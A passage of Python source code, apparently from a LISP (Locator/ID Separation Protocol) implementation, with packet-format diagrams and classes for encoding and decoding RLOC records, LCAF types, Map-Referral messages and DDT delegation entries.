# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Altitude |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Radius | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Explicit Locator Path (ELP) Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 10 | Rsvd2 | n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop k ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Replication List Entry Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 13 | Rsvd2 | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #1 RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #n RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Security Key Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 11 | Rsvd2 | 6 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Count | Rsvd3 |A| Cipher Suite| Rsvd4 |R|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Length | Public Key Material ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... Public Key Material |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Locator Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_rloc_record():
def __init__(self):
self.priority = 0
self.weight = 0
self.mpriority = 0
self.mweight = 0
self.local_bit = False
self.probe_bit = False
self.reach_bit = False
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.rloc_name = None
self.keys = None
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def print_record(self, indent):
rloc_str = self.print_rloc_name()
if (rloc_str != ""): rloc_str = ", " + rloc_str
geo_str = ""
if (self.geo):
name = ""
if (self.geo.geo_name): name = "'{}' ".format(self.geo.geo_name)
geo_str = ", geo: {}{}".format(name, self.geo.print_geo())
#endif
elp_str = ""
if (self.elp):
name = ""
if (self.elp.elp_name): name = "'{}' ".format(self.elp.elp_name)
elp_str = ", elp: {}{}".format(name, self.elp.print_elp(True))
#endif
rle_str = ""
if (self.rle):
name = ""
if (self.rle.rle_name): name = "'{}' ".format(self.rle.rle_name)
rle_str = ", rle: {}{}".format(name, self.rle.print_rle(False))
#endif
json_str = ""
if (self.json):
name = ""
if (self.json.json_name):
name = "'{}' ".format(self.json.json_name)
#endif
json_str = ", json: {}".format(self.json.print_json(False))
#endif
sec_str = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
sec_str = ", " + self.keys[1].print_keys()
#endif
line = ("{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}")
lprint(line.format(indent, self.print_flags(), self.priority,
self.weight, self.mpriority, self.mweight, self.rloc.afi,
red(self.rloc.print_address_no_iid(), False), rloc_str, geo_str,
elp_str, rle_str, json_str, sec_str))
#enddef
def print_flags(self):
return("{}{}{}".format("L" if self.local_bit else "l", "P" \
if self.probe_bit else "p", "R" if self.reach_bit else "r"))
#enddef
def store_rloc_entry(self, rloc_entry):
rloc = rloc_entry.rloc if (rloc_entry.translated_rloc.is_null()) \
else rloc_entry.translated_rloc
self.rloc.copy_address(rloc)
if (rloc_entry.rloc_name):
self.rloc_name = rloc_entry.rloc_name
#endif
if (rloc_entry.geo):
self.geo = rloc_entry.geo
else:
name = rloc_entry.geo_name
if (name and lisp_geo_list.has_key(name)):
self.geo = lisp_geo_list[name]
#endif
#endif
if (rloc_entry.elp):
self.elp = rloc_entry.elp
else:
name = rloc_entry.elp_name
if (name and lisp_elp_list.has_key(name)):
self.elp = lisp_elp_list[name]
#endif
#endif
if (rloc_entry.rle):
self.rle = rloc_entry.rle
else:
name = rloc_entry.rle_name
if (name and lisp_rle_list.has_key(name)):
self.rle = lisp_rle_list[name]
#endif
#endif
if (rloc_entry.json):
self.json = rloc_entry.json
else:
name = rloc_entry.json_name
if (name and lisp_json_list.has_key(name)):
self.json = lisp_json_list[name]
#endif
#endif
self.priority = rloc_entry.priority
self.weight = rloc_entry.weight
self.mpriority = rloc_entry.mpriority
self.mweight = rloc_entry.mweight
#enddef
def encode_lcaf(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
gpkt = ""
if (self.geo):
gpkt = self.geo.encode_geo()
#endif
epkt = ""
if (self.elp):
elp_recs = ""
for elp_node in self.elp.elp_nodes:
afi = socket.htons(elp_node.address.afi)
flags = 0
if (elp_node.eid): flags |= 0x4
if (elp_node.probe): flags |= 0x2
if (elp_node.strict): flags |= 0x1
flags = socket.htons(flags)
elp_recs += struct.pack("HH", flags, afi)
elp_recs += elp_node.address.pack_address()
#endfor
elp_len = socket.htons(len(elp_recs))
epkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_ELP_TYPE,
0, elp_len)
epkt += elp_recs
#endif
rpkt = ""
if (self.rle):
rle_recs = ""
for rle_node in self.rle.rle_nodes:
afi = socket.htons(rle_node.address.afi)
rle_recs += struct.pack("HBBH", 0, 0, rle_node.level, afi)
rle_recs += rle_node.address.pack_address()
if (rle_node.rloc_name):
rle_recs += struct.pack("H", socket.htons(LISP_AFI_NAME))
rle_recs += rle_node.rloc_name + "\0"
#endif
#endfor
rle_len = socket.htons(len(rle_recs))
rpkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_RLE_TYPE,
0, rle_len)
rpkt += rle_recs
#endif
jpkt = ""
if (self.json):
lcaf_len = socket.htons(len(self.json.json_string) + 2)
json_len = socket.htons(len(self.json.json_string))
jpkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_JSON_TYPE,
0, lcaf_len, json_len)
jpkt += self.json.json_string
jpkt += struct.pack("H", 0)
#endif
spkt = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
spkt = self.keys[1].encode_lcaf(self.rloc)
#endif
npkt = ""
if (self.rloc_name):
npkt += struct.pack("H", socket.htons(LISP_AFI_NAME))
npkt += self.rloc_name + "\0"
#endif
apkt_len = len(gpkt) + len(epkt) + len(rpkt) + len(spkt) + 2 + \
len(jpkt) + self.rloc.addr_length() + len(npkt)
apkt_len = socket.htons(apkt_len)
apkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_AFI_LIST_TYPE,
0, apkt_len, socket.htons(self.rloc.afi))
apkt += self.rloc.pack_address()
return(apkt + npkt + gpkt + epkt + rpkt + spkt + jpkt)
#enddef
def encode(self):
flags = 0
if (self.local_bit): flags |= 0x0004
if (self.probe_bit): flags |= 0x0002
if (self.reach_bit): flags |= 0x0001
packet = struct.pack("BBBBHH", self.priority, self.weight,
self.mpriority, self.mweight, socket.htons(flags),
socket.htons(self.rloc.afi))
if (self.geo or self.elp or self.rle or self.keys or self.rloc_name \
or self.json):
packet = packet[0:-2] + self.encode_lcaf()
else:
packet += self.rloc.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, nonce):
packet_format = "HBBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
#
# Process AFI-List LCAF.
#
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE):
while (lcaf_len > 0):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
packet_len = len(packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF):
packet = self.decode_lcaf(packet, nonce)
if (packet == None): return(None)
else:
packet = packet[format_size::]
self.rloc_name = None
if (afi == LISP_AFI_NAME):
packet, rloc_name = lisp_decode_dist_name(packet)
self.rloc_name = rloc_name
else:
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
#endif
lcaf_len -= packet_len - len(packet)
#endwhile
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
#
# Process Geo-Coordinate LCAF.
#
geo = lisp_geo("")
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
if (packet == None): return(None)
self.geo = geo
elif (lcaf_type == LISP_LCAF_JSON_TYPE):
#
# Process JSON LCAF.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
json_len = struct.unpack(packet_format, packet[:format_size])[0]
json_len = socket.ntohs(json_len)
if (lcaf_len < format_size + json_len): return(None)
packet = packet[format_size::]
self.json = lisp_json("", packet[0:json_len])
packet = packet[json_len::]
elif (lcaf_type == LISP_LCAF_ELP_TYPE):
#
# Process ELP LCAF.
#
elp = lisp_elp(None)
elp.elp_nodes = []
while (lcaf_len > 0):
flags, afi = struct.unpack("HH", packet[:4])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
elp_node = lisp_elp_node()
elp.elp_nodes.append(elp_node)
flags = socket.ntohs(flags)
elp_node.eid = (flags & 0x4)
elp_node.probe = (flags & 0x2)
elp_node.strict = (flags & 0x1)
elp_node.address.afi = afi
elp_node.address.mask_len = elp_node.address.host_mask_len()
packet = elp_node.address.unpack_address(packet[4::])
lcaf_len -= elp_node.address.addr_length() + 4
#endwhile
elp.select_elp_node()
self.elp = elp
elif (lcaf_type == LISP_LCAF_RLE_TYPE):
#
# Process RLE LCAF.
#
rle = lisp_rle(None)
rle.rle_nodes = []
while (lcaf_len > 0):
x, y, level, afi = struct.unpack("HBBH", packet[:6])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
rle_node = lisp_rle_node()
rle.rle_nodes.append(rle_node)
rle_node.level = level
rle_node.address.afi = afi
rle_node.address.mask_len = rle_node.address.host_mask_len()
packet = rle_node.address.unpack_address(packet[6::])
lcaf_len -= rle_node.address.addr_length() + 6
if (lcaf_len >= 2):
afi = struct.unpack("H", packet[:2])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[2::]
packet, rle_node.rloc_name = \
lisp_decode_dist_name(packet)
if (packet == None): return(None)
lcaf_len -= len(rle_node.rloc_name) + 1 + 2
#endif
#endif
#endwhile
self.rle = rle
self.rle.build_forwarding_list()
elif (lcaf_type == LISP_LCAF_SECURITY_TYPE):
#
# Get lisp_key() data structure so we can parse keys in the Map-
# Reply RLOC-record. Then get the RLOC address.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
if (len(packet) < 2): return(None)
afi = struct.unpack("H", packet[:2])[0]
self.rloc.afi = socket.ntohs(afi)
if (len(packet) < self.rloc.addr_length()): return(None)
packet = self.rloc.unpack_address(packet[2::])
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#
# Some RLOC records may not have RLOC addresses but other LCAF
# types. Don't process security keys because we need RLOC addresses
# to index into security data structures.
#
if (self.rloc.is_null()): return(packet)
rloc_name_str = self.rloc_name
if (rloc_name_str): rloc_name_str = blue(self.rloc_name, False)
#
# If we found no stored key, store the newly created lisp_keys()
# to the RLOC list if and only if a remote public-key was supplied
# in the Map-Reply.
#
stored_key = self.keys[1] if self.keys else None
if (stored_key == None):
if (key.remote_public_key == None):
string = bold("No remote encap-public-key supplied", False)
lprint(" {} for {}".format(string, rloc_name_str))
key = None
else:
string = bold("New encap-keying with new state", False)
lprint(" {} for {}".format(string, rloc_name_str))
key.compute_shared_key("encap")
#endif
#endif
#
# If we have stored-key, the other side received the local public
# key that is stored in variable 'stored_key'. If the remote side
# did not supply a public-key, it doesn't want to do lisp-crypto.
# If it did supply a public key, check to see if the same as
# last time, and if so, do nothing, else we do a rekeying.
#
if (stored_key):
if (key.remote_public_key == None):
key = None
remote = bold("Remote encap-unkeying occurred", False)
lprint(" {} for {}".format(remote, rloc_name_str))
elif (stored_key.compare_keys(key)):
key = stored_key
lprint(" Maintain stored encap-keys for {}".format( \
rloc_name_str))
else:
if (stored_key.remote_public_key == None):
string = "New encap-keying for existing state"
else:
string = "Remote encap-rekeying"
#endif
lprint(" {} for {}".format(bold(string, False),
rloc_name_str))
stored_key.remote_public_key = key.remote_public_key
stored_key.compute_shared_key("encap")
key = stored_key
#endif
#endif
self.keys = [None, key, None, None]
else:
#
# All other LCAFs we skip over and ignore.
#
packet = packet[lcaf_len::]
#endif
return(packet)
#enddef
def decode(self, packet, nonce):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.priority, self.weight, self.mpriority, self.mweight, flags, \
afi = struct.unpack(packet_format, packet[:format_size])
flags = socket.ntohs(flags)
afi = socket.ntohs(afi)
self.local_bit = True if (flags & 0x0004) else False
self.probe_bit = True if (flags & 0x0002) else False
self.reach_bit = True if (flags & 0x0001) else False
if (afi == LISP_AFI_LCAF):
packet = packet[format_size-2::]
packet = self.decode_lcaf(packet, nonce)
else:
self.rloc.afi = afi
packet = packet[format_size::]
packet = self.rloc.unpack_address(packet)
#endif
self.rloc.mask_len = self.rloc.host_mask_len()
return(packet)
#enddef
def end_of_rlocs(self, packet, rloc_count):
for i in range(rloc_count):
packet = self.decode(packet, None)
if (packet == None): return(None)
#endfor
return(packet)
#enddef
#endclass
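#
# Small sketch of the AFI-List LCAF framing (the Type=1 diagram above) that
# encode_lcaf() produces: an LCAF header under AFI 16387 whose payload is an
# AFI-prefixed address. The constants come from the diagram; this function
# is an illustration, not the encoder the class above actually uses.
#
def lisp_example_afi_list_ipv4(ipv4_bytes):
    import socket
    import struct

    lcaf_afi = 16387
    afi_list_type = 1
    afi_ipv4 = 1

    payload_len = 2 + len(ipv4_bytes)            # AFI field plus address
    packet = struct.pack("HBBBBHH", socket.htons(lcaf_afi), 0, 0,
        afi_list_type, 0, socket.htons(payload_len), socket.htons(afi_ipv4))
    return(packet + ipv4_bytes)
#enddef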
#
# Map-Referral Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=6 | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Referral Count| EID mask-len | ACT |A|I| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c |SigCnt | Map Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix ... |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |R| Loc/LCAF-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator ... |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_referral():
def __init__(self):
self.record_count = 0
self.nonce = 0
#enddef
def print_map_referral(self):
lprint("{} -> record-count: {}, nonce: 0x{}".format( \
bold("Map-Referral", False), self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REFERRAL << 28) | self.record_count
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is a DDT cache data structure that holds information configured by
# the "lisp ddt-authoritative-prefix" and "lisp delegate" commands. The
# self.delegation_set[] is a list of lisp_ddt_node()s.
#
class lisp_ddt_entry():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.delegation_set = []
self.source_cache = None
self.map_referrals_sent = 0
#enddef
def is_auth_prefix(self):
if (len(self.delegation_set) != 0): return(False)
if (self.is_star_g()): return(False)
return(True)
#enddef
def is_ms_peer_entry(self):
if (len(self.delegation_set) == 0): return(False)
return(self.delegation_set[0].is_ms_peer())
#enddef
def print_referral_type(self):
if (len(self.delegation_set) == 0): return("unknown")
ddt_node = self.delegation_set[0]
return(ddt_node.print_node_type())
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_ddt_cache.add_cache(self.eid, self)
else:
ddt = lisp_ddt_cache.lookup_cache(self.group, True)
if (ddt == None):
ddt = lisp_ddt_entry()
ddt.eid.copy_address(self.group)
ddt.group.copy_address(self.group)
lisp_ddt_cache.add_cache(self.group, ddt)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ddt.group)
ddt.add_source_entry(self)
#endif
#enddef
def add_source_entry(self, source_ddt):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ddt.eid, source_ddt)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
#endclass
class lisp_ddt_node():
def __init__(self):
self.delegate_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.map_server_peer = False
self.map_server_child = False
self.priority = 0
self.weight = 0
#enddef
def print_node_type(self):
if (self.is_ddt_child()): return("ddt-child")
if (self.is_ms_child()): return("map-server-child")
if (self.is_ms_peer()): return("map-server-peer")
#enddef
def is_ddt_child(self):
if (self.map_server_child): return(False)
if (self.map_server_peer): return(False)
return(True)
#enddef
def is_ms_child(self):
return(self.map_server_child)
#enddef
def is_ms_peer(self):
return(self.map_server_peer)
#enddef
#endclass
#
# This is a Map-Request queue used on a Map-Resolver when waiting for a
# Map-Referral to be returned by a DDT-node or a Map-Server.
#
class lisp_ddt_map_request():
def __init__(self, lisp_sockets, packet, eid, group, nonce):
self.uptime = lisp_get_timestamp()
self.lisp_sockets = lisp_sockets
self.packet = packet
self.eid = eid
self.group = group
self.nonce = nonce
self.mr_source = None
self.sport = 0
self.itr = None
self.retry_count = 0
self.send_count = 0
self.retransmit_timer = None
self.last_request_sent_to = None
self.from_pitr = False
self.tried_root = False
self.last_cached_prefix = [None, None]
#enddef
def print_ddt_map_request(self):
lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format( \
"P" if self.from_pitr else "",
red(self.itr.print_address(), False),
green(self.eid.print_address(), False), self.nonce))
#enddef
def queue_map_request(self):
self.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [self])
self.retransmit_timer.start()
lisp_ddt_map_requestQ[str(self.nonce)] = self
#enddef
def dequeue_map_request(self):
self.retransmit_timer.cancel()
if (lisp_ddt_map_requestQ.has_key(str(self.nonce))):
lisp_ddt_map_requestQ.pop(str(self.nonce))
#endif
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# -------------------------------------------------------------------
# Type (Action field) Incomplete Referral-set TTL values
# -------------------------------------------------------------------
# 0 NODE-REFERRAL NO YES 1440
#
# 1 MS-REFERRAL NO YES 1440
#
# 2 MS-ACK * * 1440
#
# 3 MS-NOT-REGISTERED * * 1
#
# 4 DELEGATION-HOLE NO NO 15
#
# 5 NOT-AUTHORITATIVE YES NO 0
# -------------------------------------------------------------------
#
LISP_DDT_ACTION_SITE_NOT_FOUND = -2
LISP_DDT_ACTION_NULL = -1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
lisp_map_referral_action_string = [
"node-referral", "ms-referral", "ms-ack", "ms-not-registered",
"delegation-hole", "not-authoritative"]
#
# Info-Request/Reply
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=7 |R| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | EID mask-len | EID-prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Request specific information following the EID-prefix:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 0 | <Nothing Follows AFI=0> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Reply specific information following the EID-prefix:
#
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = 16387 | Rsvd1 | Flags |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Type = 7 | Rsvd2 | 4 + n |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# N | MS UDP Port Number | ETR UDP Port Number |
# A +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# T | AFI = x | Global ETR RLOC Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L | AFI = x | MS RLOC Address ... |
# C +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# A | AFI = x | Private ETR RLOC Address ... |
# F +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address 1 ... |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address n ... |
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# This encoding will not use authentication so we respond to anyone who
